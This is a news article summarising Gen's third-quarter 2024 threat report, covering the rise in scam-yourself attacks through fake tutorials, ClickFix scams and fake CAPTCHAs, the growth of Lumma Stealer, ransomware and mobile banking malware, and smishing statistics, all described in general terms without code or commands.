Hackers trick victims into scam attacks with fake tutorials, CAPTCHAs and updates
- AI continues to play a dual role in cybersecurity
- Lumma Stealer rises 1154%, marking a new malware peak
- Outdated systems remain vulnerable to ransomware
In his recent Threat report for the third quarter of 2024Gen highlights alarming trends that reveal the increasing complexity of cyber threats, emphasizing that as cybercriminals refine their methods, the dual role of AI is becoming apparent.
While AI can be used to amplify attacks by spreading realistic deepfakes and highly convincing phishing campaigns, AI tools also serve as a crucial defense mechanism.
As cyber threats become more sophisticated and difficult to detect, awareness and proactive measures are essential for protecting sensitive information.
Social engineering tactics take center stage
Cybercriminals are increasingly using social engineering tactics to trick millions of people into compromising their security. Quarter-over-quarter, there has been a 614% increase in “Scam-Yourself Attacks,” which use psychological manipulation to trick individuals into unintentionally installing malware on their own devices.
Attackers will use fake tutorials shared on popular platforms such as YouTube, claiming to offer free access to paid software, enticing users to follow the instructions. However, victims unintentionally download malicious programs instead.
Another tactic, known as ClickFix Scams, deceives victims by proposing fake technical solutions and then instructing users to copy and paste malicious code into their command prompts, unknowingly giving attackers control over their systems.
Similarly, fake CAPTCHA prompts have emerged disguised as standard authentication steps, prompting users to paste malicious code into their systems. Fake updates masquerading as critical software updates are sent to users loaded with malware disguised to gain administrative privileges once installed.
Data-stealing malware and ransomware have seen a resurgence, with the number of information stealers increasing by 39%. For example, the Lumma Stealer increased its activity by 1154%.
Ransomware attacks also increased sharply, with the risk increasing by 100%, with the Magniber ransomware leading these attacks by exploiting unpatched software to gain access. Outdated systems such as Windows 7 remain particularly vulnerable, but Gen has worked with governments to release free decryption tools such as the Avast Mallox Ransomware Decryptor.
Mobile devices also saw a rise in data-stealing malware attacks, which increased 166% in the third quarter of 2024. A new strain of spyware emerged, NGate, which could clone bank card details to withdraw money or make unauthorized transactions. Meanwhile, banking malware such as Rocinante has increased by 60%, with new variants such as TrickMo and Octo2 emerging.
In terms of delivery, malicious text messages remain the primary delivery method. Norton Genie telemetry shows that smishing (malicious SMS fraud) is responsible for 16.5% of observed attacks, followed by lottery fraud (12%) and phishing emails/SMS (9.6%) .